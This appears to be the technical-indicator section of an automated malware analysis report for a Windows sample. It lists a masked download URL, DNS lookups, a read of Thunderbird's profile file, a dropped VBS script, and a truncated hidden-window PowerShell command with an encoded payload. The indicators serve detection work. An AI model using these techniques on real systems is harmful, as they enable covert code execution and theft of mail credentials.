Technical Information
- http://lo###abayev.xyz/temur/ads.jpg
- %APPDATA%\thunderbird\profiles.ini
- %HOMEPATH%\comm100chats.vbs
- DNS ASK lo###abayev.xyz
- DNS ASK ex#####ro.freeddns.org
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Comm100Chats.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -noexit -enc JgAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQALgBJAG4AdgBvAGsAZQBDAG8AbQBtAGEAbgBkAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuAEkAbgB2AG8AawBlAEMAbwBtAG0AYQ...' (with hidden window)